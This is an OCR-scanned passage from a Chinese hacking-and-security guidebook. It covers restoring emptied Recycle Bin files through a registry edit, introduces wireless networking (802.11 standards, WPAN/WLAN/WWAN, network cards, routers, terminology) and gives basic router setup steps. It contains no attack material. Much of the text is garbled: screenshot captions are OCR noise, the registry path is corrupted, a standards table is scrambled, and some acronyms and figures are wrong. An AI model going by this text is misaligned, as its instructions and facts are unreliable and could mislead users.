(ED22rOF-9Ehe-4370-83b1-96b02CFEODS) 
DCST8D6-4D53-tb2fA265-58055748ES6 时 
HPO2CIA0D-BE21-4350.8880.7367FC96EF3C1 


由 popopimization vt > 
HEY LOCAL MACHINENSOFTWAREicrocofn Windows\CurrentVercion\Explorer\Desiiop\NameSpace\§h) 


[step 国 在 窗口 的 右 侧 选 中 系统 默认 项 并 右 
击 ， 在 弹出 的 快捷 菜单 中 选择 “修改 ” 菜 
单 选 项 ， 打 开 “ 编 辑 字符 串 ” 对 话 框 ， 将 
数值 数据 设置 为 “回收 站 ”， 如 下 图 所 示 。 


编 吉 字 行 证 x 


数值 名 称 (N): 
车 认 ) 


数 从 (Vj: 
ya 


Ew | Cw 


[sep 国 在 窗口 的 左 侧 空白 处 右 击 ， 在 弹出 的 
快捷 菜单 中 选择 “新 建 ” 一 “项 ”菜单 命令 ， 
如 下 图 所 示 。 
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step 园 单 击 “ 确 定 ” 按 钮 ， 退 出 注册 表 ， 重 
新 启动 计算 机 ， 即 可 将 清空 的 文件 恢复 ， 
如 下 图 所 示 。 


第 11 章 ”磁盘 数据 的 备份 与 恢复 技巧 三 于 


| 。 者 钠 六 问 


i Windovsio (C) 
ED] 
一 本 地 而 音 (E) 


避 本 地 辜 盘 (F) 
0 个 项 目 


国 | 四 | 
| z+ 


个 国 ， 回 pas 


而 块 沪 问 
位 OneDrive 
EL 

国 Ye 

刷 男 H 

国 阁 

时代 

EF 

CE 

和 Windows10 (C:) 

= (0) 

二 本 地 涪 鱼 (E:) 


和 
1 个 项目。 地 中 1 个 现 目 


EGG 图 右 二 该 文件 天 ， 在 弹出 的 快捷 菜单 
选择 “还原” 菜单 命令 ， 如 下 图 所 示 。 


BI es = 0 % 
人 © 
vO 提 E 内 
y a 
EE 
BR 

EE 

弄 隆 (D) 

2 


step 罗 即 可 将 “回收 站 ”中 的 “图 片 ” 文 件 
夹 还 原 到 其 原来 的 位 置 ， 如 下 图 所 示 。 


二 | 加 国 s | BF 
Ez == := =s @ 


让- 个 下， 有 有关 ， 二 送 生 站 加 


三 oneDrive 


ET 


rogramData 
视频 
国 i 晶 Tpoowmload 


晶 wndovws 
EE EPE 
*™ 和 

小 杯 和 

国 本 

a windomalo tc 

= + DY 

EE 

一 人) 

一 Hi 


8 个 Ja。 选中 1 人 大 上 了 EE 日 
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第 12 重 无线 网 络 的 组 建 与 
安全 分 析 


无 线 网 络 ， 特 别 是 无 线 局 域 网 给 人 们 的 生活 带 来 了 极 大 的 方便 ， 为 人 们 提供 了 无 处 
不 在 的 、 高 带宽 的 网 络 服务 ， 但 是 ， 由 于 无 线 信道 特有 的 性 质 ， 使 得 无 线 网 络 连接 具有 
不 稳定 性 ， 且 容易 受到 黑客 的 攻击 ， 从 而 大 大 影响 了 服务 质量 。 本 章 介绍 无 线 网 络 的 组 
建 以 及 安全 性 分 析 ， 主 要 内 容 包 括 无 线 网 络 相关 概念 、 组 建 无 线 网 络 、 无 线 网 络 的 安全 


分 析 等 。 


12.1 认识 无 线 网 络 及 相关 概念 


无 线 网 络 (Wireless Network) 是 采用 
无 线 通信 技术 实现 的 网 络 ， 与 有 线 网 络 的 
用 途 十 分 相似 ， 最 大 的 不 同 在 于 传输 媒介 
的 不 同 ， 一 般 来 说 ， 无 线 网 络 可 以 分 为 狭 
义 无 线 网 络 和 广义 无 线 网 络 两 种 。 


12.1.1 狭义 无 线 网 络 


狭义 无 线 网 络 就 是 常 说 的 无 线 局 域 网 
是 基于 IEEE 802.11b/g/n 标准 的 WLAN 无 
线 局 域 网 ， 具 有 可 移动 性 、 安 装 简单 、 高 
灵活 性 和 高 扩展 能 力 等 特点 ， 作 为 对 传统 
有 线 网 络 的 延伸 ， 这 种 无 线 网 络 在 许多 特 
殊 环 境 中 得 到 了 广泛 的 应 用 ， 如 企业 内 部 、 
学 校内 部 、 家 庭 等 。 这 种 网 络 的 缺点 是 覆 
盖 范 围 小 ， 使 用 距离 为 5 ~ 30m。 下 图 为 
一 个 简单 的 无 线 网 示意 图 。 


已 


-i 


ee A 


随 着 无 线 数据 网 络 解决 方案 的 不 断 推 
出 ， 全 球 WiFi 设备 迅猛 增长 ， 相 信 在 不 久 
的 将 来 ,“ 无 论 在 任何 时 间 、 任 何 地 点 都 可 
以 轻松 上 网 ”这 一 目标 就 会 被 实现 ， 下 面 
介绍 一 下 有 关 无 线 网 络 的 概念 。 


1. 无 线 网 络 的 起 源 


无 线 网 络 的 起 源 ， 可 以 追溯 到 几 十 年 
前 的 第 二 次 世界 大 战 期 间 ， 当 时 美军 采用 
无 线 电信 号 进行 资料 的 传输 ， 他 们 研发 出 
了 一 套 无 线 电 传输 技术 ， 并 且 采 用 相当 高 
强度 的 加 密 技 术 。 当 初 美军 和 盟 军 都 广泛 
使 用 这 项 技术 。 

这 项 技术 让 许多 学 者 得 到 了 灵感 ， 在 
1971 和 年， 夏威夷 大 学 (University of Ha- 
waii) 的 研究 员 创 造 了 第 一 个 基于 封包 式 技 
术 的 无 线 电 通信 网 络 ， 被 称 作 ALOHNET 
的 网 络 ， 可 以 算是 早期 的 无 线 局 域 网 络 
(WLAN) 了 。 这 个 最 早 的 WLAN 包括 了 
7 台 计 算 机 ， 它 们 采用 双向 星 状 拓扑 (Bi- 
directional Star Topology) ， 横 跨 四 座 夏 威 夷 
的 岛屿 ， 中 心计 算 机 放置 在 瓦 胡 岛 (Oahu 
Island) 上 ， 从 这 时 开始 ， 无 线 网 络 可 说 是 
正式 诞生 了 。 如 下 图 所 示 为 一 个 星 状 拓扑 
结构 示意 图 。 


2. IEEE 802.11 标 准 


IEEE 802.11 标准 第 一 个 版 本 发 表 于 
1997 年 ， 其 中 定义 了 介质 访问 接 入 控制 层 
(MAC 层 ) 和 物理 层 。 物 理 层 定义 了 工作 
在 2.4GHz 的 ISM 频段 上 的 两 种 无 线 调 频 
方式 和 一 种 红外 传输 的 方式 ， 总 数据 传输 
速率 设计 为 2Mb/s。 两 个 设备 之 间 的 通信 可 
以 以 自由 直接 (ad hoc) 的 方式 进行 ， 也 可 
以 在 基站 (Base Station，BS) 或 者 访问 点 
(Access Point，AP) 的 协调 下 进行 。 

作为 无 线 网 络 重要 发 展 标准 ， 用 户 还 
是 有 必要 了 解 一 下 IEEE 802.11 标准 的 发 展 
史 ， 具 体内 容 如 下 表 所 示 。 


表 IEEE 802.11 标 准 的 发 展 史 


符合 8021D 的 煤 体 捷 入 控制 层 改 接 《MAG 
Layer Bridging) 


根据 各 国 无 线 电 规定 做 的 调整 
对 服务 等 级 (Quality of Service. QoS) 的 支持 


基站 的 互 连 性 (IAPP, Inter-Access Point| 
Protocol) ，2006 年 2 月 被 IEEE 批 准 撤销 
IEEE s02.118 2003 年 ， 物 理 层 补充 〈54Mb/s， 工 作 在 
2.4GHz) 


2004 年 ， 无 线 覆 盖 半 径 的 调整 ， 室 内 (in-| 
door) 和 室外 (outdoor) 信道 (5GHz 频 段 ) 
2009 年 9 月 通过 正式 标准 ，WLAN 的 传输 | 
速率 由 IEEE 802.11a 及 IEEE 802.11g 提 供 的 
EEE 802.11n|S4 Yb/s、 108Mb/s, 各 和 到 350Nb 这 到 内 
达 475Mb/s 


eee so noo 这 人 要 用 在 和 用 电子 的 无 | 


IEEE 802.11h 
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目前 ， 无 线 网 络 及 设备 主要 使 用 的 是 
IEEE 802.llb/g/n 标准 ， 尤 其 以 IEEE 802.llg 
最 为 普及 ， 不 过 IEEE 802.1ln 正在 以 飞快 的 
速度 赶 超 。 

除了 上 面 的 IEEE 标准 ， 另 外 有 一 个 
被 称 为 IEEE 802.11b+ 的 技术 ， 通 过 PBCC 

(Packet Binary Convolutional Code) 技 术 
在 IEEE 802.11b (2.4GHz 频段 ) 基础 上 提 
供 22Mb/s 的 数据 传输 速率 。 但 这 事实 上 并 
不 是 一 个 IEEE 的 公开 标准 ， 而 是 一 项 产权 
私有 的 技术 。 


3. WiFi 联 盟 


WiFi 联盟 成 立 于 1999 年 ， 是 一 家 全 球 
及 非 营 利 性 的 行业 协会 ,拥有 几 百 家 企业 
会 员 ， 致 力 解决 符合 IEEE 802.11 标准 的 产 
品 的 生产 和 设备 兼容 性 问题 ， 从 而 推动 无 
线 局 域 网 产业 的 发 展 ， 以 增强 移动 无 线 、 
便携 、 移 动 和 家 用 设备 的 用 户 体验 为 目标 。 
自 2003 年 3 月 WiFi 联盟 开展 此 项 认证 以 
来 ， 已 经 有 超过 4000 多 种 产品 获得 了 WiFi 
GERTIFIED 指定 认证 标志 ， 有 力 地 推动 了 
WiFi 产品 和 服务 在 消费 者 市 场 和 企业 市 场 
两 方面 的 全 面 开展 。 

如 下 图 所 示 为 WiFi 联盟 认证 标志 ， 该 
标志 就 是 无 线 技术 支持 的 象征 ， 被 广泛 应 
用 在 智能 手机 、 平 板 电脑 、 笔 记 本 电脑 和 
各 种 便携 式 设 备 上 。 

wi 


CERTIFIED 


4. 无 线 网 络 的 组 成 


无 线 网 络 由 以 下 几 个 部 分 组 成 。 

(1) 站 点 (Station): 网 络 最 基本 的 组 
成 部 分 ， 通 常 指 的 就 是 无 线 客户 端 。 

(2) 基本 服务 单元 (Basic Service 
Set，BSS): 网 络 最 基本 的 服务 单元 。 最 简 
单 的 服务 单元 可 以 只 由 两 个 无 线 客户 端 组 
成 ， 客 户 端 可 以 动态 地 连接 (Associate) 到 
基本 服务 单元 中 。 
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(3) 分 配 系统 (Distribution System， 
DS): 分 配 系统 用 于 连接 不 同 的 基本 服务 单 
元 ， 分 配 系统 使 用 的 媒介 逻辑 上 和 基本 服 
务 单 元 使 用 的 媒介 是 截然 分 开 的 ， 尽 管 它 
们 物理 上 可 能 会 是 同一 个 媒介 ， 如 同一 个 
无 线 频道 。 

(4) 接 入 点 (Access Point，AP): 无 
线 接 入 点 既 具 有 普通 有 线 接 入 点 的 能 力 ， 
又 具有 接 入 到 上 一 层 网 络 的 能 力 。 其 实 AP 
和 无 线路 由 器 是 有 区 别 的 ， 相 比 来 说 ,无 
线路 由 器 的 功能 更 多 ， 不 过 在 基本 功能 上 ， 
两 者 并 无 实质 性 的 区 别 ， 所 以 在 实际 应 用 
中 ， 都 会 将 无 线路 由 器 称 之 为 AP。 

(5) 扩展 服务 单元 (Extended Service 
Set，ESS): 由 分 配 系统 和 基本 服务 单元 组 
合 而 成 。 这 种 组 合 是 逻辑 上 的 ， 并 非 物理 
上 的 ， 不 同 的 基本 服务 单元 有 可 能 在 地 理 
位 置 上 相差 甚 远 。 分 配 系统 也 可 以 使 用 各 
种 各 样 的 技术 。 

(6) 关口 (Portal): 用 于 将 无 线 局 域 
网 和 有 线 局 域 网 或 其 他 网 络 联系 起 来 ， 是 
一 个 逻辑 成 分 。 

以 上 组 成 部 分 使 用 了 3 种 媒介 ， 站 点 
使 用 的 无 线 媒介 ， 分 配 系统 使 用 的 媒介 ， 
以 及 和 无 线 局 域 网 集成 一 起 的 其 他 局 域 网 
使 用 的 媒介 ， 物 理 上 它们 可 能 相互 重合 。 
IEEE 802.11 只 负责 在 站 点 使 用 的 无 线 媒介 
上 寻找 地 址 ， 分 配 系统 和 其 他 局 域 网 的 寻 
址 不 属于 无 线 局 域 网 的 范围 。 


5. 无 线 网 络 的 运行 原理 


要 想 建 立 一 个 有 效 运 行 的 无 线 网 络 ， 
首先 需要 至 少 一 个 Access Point 即 AP， 如 
无 线路 由 器 ， 然 后 是 至 少 一 个 无 线 客户 端 ， 
即 装 有 无 线 网 卡 的 便携 式 设 备 ， 如 计算 机 、 
手机 、 平 板 电脑 等 。 硬 件 准 备 完成 后 ，AP 
每 100ms 将 SSID 信号 封包 广播 一 次 ， 无 线 
客户 端 可 以 借 此 决定 是 否 要 和 这 一 个 SSID 
的 AP 连接 ， 使 用 者 还 可 以 设 定 要 连接 到 哪 
一 个 SSID。 这 就 好 比 用 户 使 用 智能 手机 连 


206 


接 周 边 的 WiFi 一 样 ， 可 以 有 选择 地 进行 连 
接 ， 如 下 图 所 示 。 不 过 ，WiFi 系统 总 是 对 
客户 端 开放 其 连接 标准 的 ， 并 支持 漫游 ， 
这 是 WiFi 的 优点 。 


12.1.2 ”广义 无 线 网 络 


广义 无 线 网 络 主要 包含 3 个 方面 ， 分 
别 是 WPAN、WLAN 和 WWAN， 下 面 分 别 
进行 介绍 。 


1. WPAN 


WPAN (无 线 个 人 局 域 网 通信 技术 ) 是 
Wireless Personal Area Network 的 缩写 ， 指 
无 线 个 人 局 域 网 通信 技术 ， 即 常 说 的 无 线 
个 人 局 域 网 。 无 线 个 人 局 域 网 (WPAN) 是 
一 种 采用 无 线 连接 的 个 人 局 域 网 。 它 被 用 
在 诸如 电话 、 计 算 机 、 附 属 设备 以 及 小 范 
围 (个 人 局 域 网 的 工作 范围 一 般 是 在 10m 
以 内 ) 内 的 数字 助理 设备 之 间 的 通信 。 

无 线 个 人 局 域 网 (WPAN) 是 一 种 与 无 
线 广 域 网 (WPAN) 、 无 线 局 域 网 (WPAN) 
并 列 但 覆盖 范围 相对 较 小 的 无 线 网 络 。 在 
网 络 构成 上 ，WPAN 位 于 整个 网 络 链 的 末 
端 ， 用 于 实现 同一 地 点 终端 与 终端 间 的 连 
接 ， 如 连接 手机 和 蓝牙 耳机 等 ，WPAN 设 
备 具 有 价格 便宜 、 体 积 小 、 易 操作 和 功 耗 
低 等 优点 。 如 下 图 所 示 为 一 个 蓝牙 耳机 的 
外 观 。 


支持 无 线 个 人 局 域 网 的 技术 包括 蓝 
牙 、ZigBee、 超 频 波 段 C(UWB) 、IDA、 
HomeRF 等 ， 其 中 蓝牙 技术 在 无 线 个 人 局 域 
网 中 使 用 的 最 广泛 ， 下 面 介绍 几 种 主要 的 
技术 。 

(1) Bluetooth (蓝牙 ): 蓝牙 是 一 种 短 
距离 无 线 通信 技术 ， 它 可 以 用 于 在 较 小 的 
范围 内 通过 无 线 连 接 的 方式 实现 固定 设备 
或 移动 设备 之 间 的 网 络 互联 ， 从 而 在 各 种 
数字 设备 之 间 实 现 灵活 、 安 全 、 低 功 耗 、 
低 成 本 的 语音 和 数据 通信 。 

蓝牙 技术 的 一 般 有 效 通信 范围 为 
10m， 强 的 可 以 达到 100m 左右 ， 其 最 高 速 
率 可 达 1Mb/s。 其 传输 使 用 的 功 耗 很 低 ， 广 
泛 应 用 于 无 线 设备 ， 如 PDA、 手 机 、 智 能 
电话 等 领域 。 如 下 图 所 示 为 一 个 智能 手机 
的 蓝牙 设置 界面 ， 在 其 中 可 以 开启 与 关闭 


蓝牙 。 
中 国电 信 旧 日 $0 人 RD 1548 
蓝牙 
开 
晤 @D 
开放 检测 
设备 名 称 HUAwEI MAIMANG 5 
接收 的 文件 
可 用 设备 
E8:E1:BC:3C:1F:30 
有 搜索 到 目标 设备 ? 埋 着 可 能 原因 
a 三 
[| 加 


(2) IDA (红外 ): IDA 是 红外 数据 
组 织 (Infrared Data Association) 的 简称 ， 
目前 广泛 采用 的 IDA 红外 连接 技术 就 是 
由 该 组 织 提 出 的 。 到 目前 为 止 ， 全 球 采 用 
IDA 技术 的 设备 超过 了 5000 万 部 。 

IDA 技术 的 主要 特点 是 : 利用 红外 传 
输 数 据 ， 无 须 专门 申请 特定 频段 的 使 用 执 
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照 ， 设备 体积 小 、 功 率 低 ， 由 于 采用 点 到 
点 的 连接 ， 数 据 传输 所 受到 的 干扰 较 小 ， 
数据 传输 速率 高 ， 可 达 1Gb/s。 但 存在 一 定 
的 技术 缺陷 ， 如 受 视 距 影响 其 传输 距离 短 、 
要 求 通 信 设 备 的 位 置 固定 、 其 点 对 点 的 传 
输 连 接 无 法 灵活 地 组 成 网 络 等 。 如 下 图 所 
示 为 计算 机 的 红外 线 接口 。 


2. WLAN 


WLAN (无 线 局 域 网 ) 即 Wireless Lo- 
cal Area Networks 的 缩写 ， 指 的 就 是 无 线 局 
域 网 ， 也 就 是 上 面 所 说 的 “狭义 无 线 网 络 ”， 
具体 请 参考 上 面 狭义 无 线 网 络 的 内 容 。 


3. WWAN 


WWAN (无 线 广域网 通信 技术 ) 是 
Wireless Wide Area Network 的 缩写 ， 指 无 
线 广域网 通信 技术 ， 即 常 说 的 无 线 广域网 。 
WWAN 技术 是 使 得 笔记 本 电脑 或 者 其 他 的 
设备 装置 在 蜂窝 网 络 覆 盖 范 围 内 可 以 在 任 
何 地 方 连接 到 互联 网 。 

简单 地 说 ，WWAN 指 的 就 是 通过 通 
信 设 备 和 通信 网 络 来 上 网 ， 不 管 是 以 前 的 
GSM、EDGE 和 CDMA， 还 是 现在 的 3G、 
4G 网 络 , 只 要 用 计算 机 中 的 PC 卡 装 SIM 卡 ， 
或 者 把 手机 连 在 笔记 本 电脑 上 当做 Modem 
联网 ， 都 叫 WWAN。 如 下 图 所 示 为 手机 中 
的 SIM 卡 ， 通 过 SIM 卡 ， 用 户 可 以 实现 手 


机 上 网 。 33 


207 


“ 


黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


12.1.3 ”认识 无 线 网 卡 


对 于 初次 接触 无 线 网 络 的 用 户 来 说 
无 线 网 卡 与 无 线 上 网 卡 是 有 些 迷惑 的 ， 本 
节 就 来 介绍 什么 是 无 线 网 卡 ， 什 么 是 无 线 
上 网 卡 。 


1. 无 线 网 卡 


无 线 网 卡 采 用 无 线 信 号 进行 数据 传输 。 
根据 接口 类 型 不 同 ， 主 要 有 PCI 无 线 网 卡 、 
PCMCIA 无 线 网 卡 、Mini-PCI 无 线 网 卡 、 
USB 无 线 网 卡 、CF/SD 无 线 网 卡 几 类 产品 。 

(1) PCI 无线 网 卡 ， 主要 用 于 台式 计 
算 机 之 中 ， 如 下 图 所 示 为 TP-LINK 出 品 的 
PCI 无 线 网 卡 。 


(2) PCMCIA 无 线 网 卡 : 主要 用 于 笔 
记 本 电脑 之 中 ， 如 下 图 所 示 为 LINKSYS 出 
品 的 PCMCIA 无 线 网 卡 。 


(3) Mini-PCI 无 线 网 卡 : Mini-PCI 为 
内 置 型 无 线 网 卡 ， 被 广泛 应 用 于 笔记 本 电 
脑 之 中 ， 其 优点 是 无 须 占 用 PC 卡 或 USB 
插 槽 ， 并 且 免 去 了 随时 随身 携 一 张 PC 卡 或 
USB 卡 的 麻烦 。 

这 几 种 无 线 网 卡 在 价格 上 差距 不 大 ， 
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在 性 能 和 功能 上 也 差不多 ， 用 户 可 根据 自 
己 的 需要 来 选择 。 在 距离 上 来 说 ， 无 线 网 
卡 是 依靠 接收 附近 无 线 网 络 信号 来 上 网 的 
这 个 信号 源 不 能 离 得 太 远 ， 一 般 无 线 网 卡 
是 配合 无 线路 由 器 来 使 用 的 ， 使 用 距离 为 
5 一 30m。 


2. 无 线 上 网 卡 


无 线 上 网 卡 指 的 是 无 线 广域网 卡 ， 
是 依靠 接收 无 线 宽带 运营 商 在 公共 场所 发 
出 的 网 络 信号 来 上 网 的 ， 这 个 信号 源 可 以 
离 无 线 上 网 的 计算 机 很 远 ， 如 联通 的 CD- 
MA1X 上 网 卡 、 移 动 的 GPRS 无 线 上 网 卡 、 
电信 的 EVDO 无 线 上 网 卡 以 及 移动 、 联 通 
的 3G、4G 卡 等 。 

无 线 上 网 卡 的 作用 于 功能 相当 于 有 线 
的 调制 解 调 器 ， 也 就 是 俗称 的 “ 猫 ?， 它 可 
以 在 拥有 无 线 信号 覆盖 的 任何 地 方 ， 利 用 
无 线 上 网 卡 来 连接 到 互联 网 上 。 从 理论 上 
来 讲 ， 假 如 购买 了 移动 的 无 线 上 网 卡 ， 那 
么 在 有 移动 基站 信号 覆盖 的 地 方 都 可 以 进 
行 无 线 上 网 。 

一 般 来 讲 ， 无 线 上 网 卡 的 信号 强度 要 
比 有 线 网 卡 差 一 些 ， 但 也 能 满足 一 些 基础 
的 网 络 应 用 ， 如 浏览 网 页 、 收 发 邮件 、QQ 
聊天 等 。 不 过 ， 随 着 无 线 网 络 技术 的 发 展 ， 
尤其 是 现在 的 EVDO、TD-CDMA 等 3G、 
4G 技术 的 出 现 ， 使 得 无 线 上 网 速度 大 大 提 
升 。 如 下 图 所 示 为 中 国 出 品 的 天 辟 4G 无 线 
上 网 卡 。 


© 
无 线 上 网 卡 一 般 只 针对 笔记 本 电脑 用 
户 ， 常 用 的 接口 类 型 为 USB 接口 ， 但 也 有 


PCMCIA 接口 类 型 的 ， 如 下 图 所 示 为 中 兴 
的 4G 无 线 上 网 卡 。 作 为 硬件 ， 一 般 在 用 户 


购买 无 线 上 网 套餐 的 时 候 ， 运 营 商 会 赠送 
无 线 上 网 卡 的 。 


12.1.4 ”认识 无 线路 由 器 


无 线路 由 器 是 应 用 于 用 户 上 网 、 带 有 
无 线 覆 盖 功 能 的 路 由 器 ， 它 和 有 线路 由 器 
的 作用 是 一 样 的 ， 唯 一 不 同 的 就 是 无 线路 
由 器 的 顶部 或 者 尾部 多 了 一 个 或 者 几 个 天 
线 ， 其 作用 就 是 提供 无 线 网 络 的 支持 。 除 
此 以 外 ， 其 他 无 论 是 外 观 ， 或 者 是 内 在 配 
置 页 面 都 和 同 款 型 的 有 线路 由 器 一 模 一 样 。 

市 面 上 每 一 个 厂商 的 无 线 产品 都 有 自 
己 的 特点 ， 如 下 图 所 示 为 美 版 思科 LINK- 
SYS WRT1900AC 双 频 无 线路 由 器 ， 该 路 由 
器 具有 4 个 天 线 ， 支 持 用 户 根据 需要 对 天 
线 拆卸 和 换 装 ， 非 常 方便 。 另 外 ， 该 路 由 
器 支持 IEEE 802.11b/g 协议 ， 其 特点 是 使 
用 多 个 无 线 来 分 工 进行 无 线 数 据 的 接收 与 
发 送 。 


目前 ， 市 场 占 有 率 比 较 高 的 无 线路 由 
器 是 TP-LINK 无 线路 由 器 ， 其 性 价 比 比较 
高 。 如 下 图 所 示 为 TP-LINK 千 兆 无 线路 由 
器 ， 具 有 高 速 双核 、 覆 盖 更 远 、 家 长 控制 、 
一 键 禁 用 等 功能 。 
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为 方便 大 家 选 购 无 线路 由 器 ， 下 面 把 
目前 市 面 上 常见 的 无 线 设备 厂商 列举 出 来 ， 
包括 厂商 名 称 、 官 方 网 站 以 及 个 人 建议 等 
信息 ， 如 下 表 所 示 。 


表 常见 无 线路 由 器 
厂商 名 称 官方 网 站 建议 
i www.linksys.com/cn/ | 价格 昂贵 ， 性 能 好 
a www.dlink.com.cn a 比 不 错 ， 性 能 
TP-LINK i 性 价 比 比较 高 ,市 
( 普 联 ) 有 Bk 场 占有 率 较 高 
Netgear | ww dpi 价格 比较 贵 ， 性 能 
(网 件 ) | | 不 错 
ASUS. | Sane an 不 太 稳定 ， 价 格 还 
(华硕 ) Ce 可 以 
Tu www.tenda.com.cn 性 价 比较 高 ， 性 能 
(腾达 》 i 稳定 
MERCURY |www.mercurycom. | 价格 较 高 ， 性 能 比 
(水 星 ) | com.cn 较 稳定 
12.1.5 无 线 网 络 中 的 术语 
下 面 是 无 线 网 络 安全 中 常会 涉及 的 基 
本 术语 ， 了 解 这 些 术语 ， 可 以 帮助 用 户 更 


好 地 维护 无 线 网 络 安全 。 

(1) WiFi: WiFi 是 一 种 允许 电子 设备 
连接 到 一 个 无 线 局 域 网 (WLAN) 的 技术 ， 
通常 使 用 2.4G UHF 或 SG SHF ISM 射频 频 
段 。 连 接 到 无 线 局 域 网 通常 是 有 密码 保护 
的 ; 但 也 可 以 是 开放 的 ， 这 样 就 允许 任何 
在 WLAN 范围 内 的 设备 可 以 连接 上 。 

(2) SSID: SSID 是 Service Set Identifi- 
er 的 缩写 ， 意 思 是 服务 集 标识 符 。SSID 技 
术 可 以 将 一 个 无 线 局 域 网 分 为 几 个 需要 不 
同 身份 验证 的 子 网 络 ， 每 一 个 子 网 络 都 需 
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要 独立 的 身份 验证 ， 只 有 通过 身份 验证 的 
用 户 才 可 以 进入 相应 的 子 网 络 ， 防 止 未 被 
授权 的 用 户 进入 本 网 络 。SSID 可 以 是 任何 
字符 ， 最 大 长 度 为 32 个 字符 。 

(3) WAP: WAP 是 Wireless Applica- 
tion Protocol 的 缩写 ， 无 线 应 用 协议 ， 是 
一 项 全 球 性 的 网 络 通信 协议 。 它 使 移动 
Intemet 有 了 一 个 通行 的 标准 ， 其 目标 是 将 
Intemet 的 丰富 信息 及 先进 的 业务 引入 到 移 
动 电话 等 无 线 终端 之 中 。 

(4) AP: Wireless Access Point， 无 线 
访问 接 入 点 。AP 就 是 传统 有 线 网 络 中 的 
HUB， 也 是 组 建 小 型 无 线 局 域 网 时 最 常用 
的 设备 。AP 相当 于 一 个 连接 有 线 网 和 无 线 
网 的 桥梁 ， 其 主要 作用 是 将 各 个 无 线 网 络 
客户 端 连接 到 一 起 ， 然 后 将 无 线 网 络 接 入 
以 太 网 。 

(5) WEP: WEP 是 Wired Equivalent 
Privacy 的 缩写 ， 是 目前 比较 常用 的 无 线 网 
络 认证 机 制 之 一 ， 它 是 IEEE 802.11 定义 下 
的 一 种 加 密 方式 。 简 单 地 说 ， 就 是 先 在 无 
线 AP 中 设 定 一 组 密码 ， 使 用 者 要 连接 上 这 
个 无 线 AP 时 ， 必 须 输 入 相同 的 密码 才能 连 
接 上 ， 可 以 有 效 防 止 非法 用 户 窃听 或 侵入 
无 线 网 络 。 

(6) WPA: 是 WiFi Protected Access 
的 缩写 ， 是 一 种 基于 标准 的 可 互 操 作 的 
WLAN 安 全 性 增强 解决 方案 ， 可 大 大 增强 
现 有 以 及 未 来 无 线 局 域 网 系统 的 数据 保护 
和 访问 控制 水 平 ， 分 为 个 人 WPA-Personal 
与 企业 WPA-Enterprise 两 种 。 

(7) EAP: Extensible Authentication 
Protocol， 扩 展 认证 协议 ， 是 一 种 用 于 验证 
网 络 设备 身份 的 鉴 权 机 制 。 

(8) GPS: 全 球 定位 系统 (Global Posi- 
tioning System，GPS) ， 又 称 全 球 卫星 定位 
系统 ， 是 一 个 中 距离 圆 形 轨道 卫星 导航 系 
统 。 它 可 以 为 地 球 表面 绝 大 部 分 地 区 (98%) 
提供 准确 的 定位 、 测 速 和 高 精度 的 时 间 
标准 。 
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12.2 组 建 无 线 网 络 并 实现 上 网 


无 线 局 域 网 络 的 搭建 给 家 庭 无 线 办 公 
带 来 了 很 多 方便 ， 而 且 可 随意 改变 家 庭 里 
的 办 公 位 置 而 不 受 束缚 ， 大 大 适应 了 现代 
人 的 追求 。 


绝招 1: 搭建 无 线 网 环境 


建立 无 线 局 域 网 的 操作 比较 简单 ， 在 
有 线 网 络 到 户 后 ， 用 户 只 须 连接 一 个 具有 
无 线 WiFi 功能 的 路 由 器 ， 然 后 各 房间 里 的 
计算 机 、 笔 记 本 电脑 、 手 机 和 iPad 等 设备 
利用 无 线 网 卡 与 路 由 器 之 间 建 立 无 线 连接 ， 
即 可 构建 整个 办 公 室 的 内 部 无 线 局 域 网 ， 
如 下 图 所 示 为 一 个 无 线 局 域 网 连接 示意 图 。 


(Internet 力 
ADSLCabel 


p> 


/ 


TFW3000 无 线 网 关 
安装 无 线 网 
卡 的 计算 机 


安 半 网 独 ”7 
的 计算 机 上， 


绝招 2: 配置 无 线 局 域 网 


建立 无 线 局 域 网 的 第 一 步 就 是 配置 无 出 
线路 由 器 ， 默 认 情况 下 ， 具 有 无 线 功能 的 
路 由 器 是 不 开启 无 线 功能 的 ， 需 要 用 户 手 
动 配置 ， 在 开启 了 路 由 器 的 无 线 功能 后 
下 面 就 可 以 配置 无 线 局 域 网 了 。 

使 用 计算 机 配置 无 线 网 的 具体 操作 步 
又 如 下 。 


stp 图 打开 正 浏 览 器 ， 在 地 址 栏 中 输入 路 
由 器 的 网 址 ， 一 般 情 况 下 路 由 器 的 默认 网 
址 为 192.168.0.1， 输 入 完毕 后 单 击 “ 转 至 ” 
按钮 ， 即 可 打开 路 由 器 的 登录 窗口 ， 如 下 
图 所 示 。 
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日 TwnaasN “ 醒 3 x | 功能 ， 并 选中 “开始 无 线 功能 ”和 “开启 
SD gp SSID 广播 ” 复 选 框 ， 如 下 图 所 示 。 
EP 了 国 二 本 两 
请 输入 管理 员 密码 
[区 A  | 
[step 图 在 “请 输入 管理 员 密 码 ” 文 本 框 中 输 
入 管理 员 的 密码 ， 默 认 情 况 下 管理 员 的 密 


友 光 123456 站 如 下 图 所 二 [EEC 当 开 启 了 路 由 器 的 无 线 功能 后 ， 单 击 


“保存 ”按钮 进行 保存 ， 然 后 重新 启动 路 
由 器 ， 即 可 完成 无 线 网 的 设置 ， 这 样 具 有 
WiFi 功能 的 手机 、 计 算 机 、iPad 等 电子 设 
备 就 可 以 与 路 由 器 进行 无 线 连 接 ， 从 而 实 
现 共享 上 网 。 


绝招 3: 将 计算 机 接 入 无 线 网 
eR 


笔记 本 电脑 具有 无 线 接 入 功能 ， 台 式 嚣 
计算 机 要 想 接 入 无 线 网 ， 需 要 购买 相应 的 
无 线 接收 器 。 这 里 以 笔记 本 电脑 为 例 ， 介 
5 国 单 二 “确认 ”按钮 ， 即 可 进入 路 由 器 ” 绍 如 何 将 计算 机 接 入 无 线 网， 具体 的 操作 
的 “运行 状态 ”工作 界面 ， 在 其 中 可 以 查 ”步骤 如 下 。 
看 路 由 器 的 基本 信息 ， 如 下 图 所 示 。 [5 国 双 去 笔记 本 电脑 桌面 右 下 角 的 无 线 连 
接 图 标 ， 打 开 “ 网 络 和 共享 中 心 ” 窗 口 ， 
在 其 中 可 以 看 到 这 人 台 笔 记 本 电脑 的 网 络 连 
接 状 态 ， 如 下 图 所 示 。 


口 rwpagsn 加 一 


= 
€ 全 OO | 女 | 三 总 


a 一 
个 让 四 
信和 
i 吉 看 基本 网 络 信 息 并 设置 连 过 
Ess 
pre 和 
Ra 
Ase 


和 和 SVPN 党; 可 生活 半 入 才 ， 
司 emus 
和 


step 园 选择 窗口 左 侧 的 “无 线 设置 ”选项 ， 
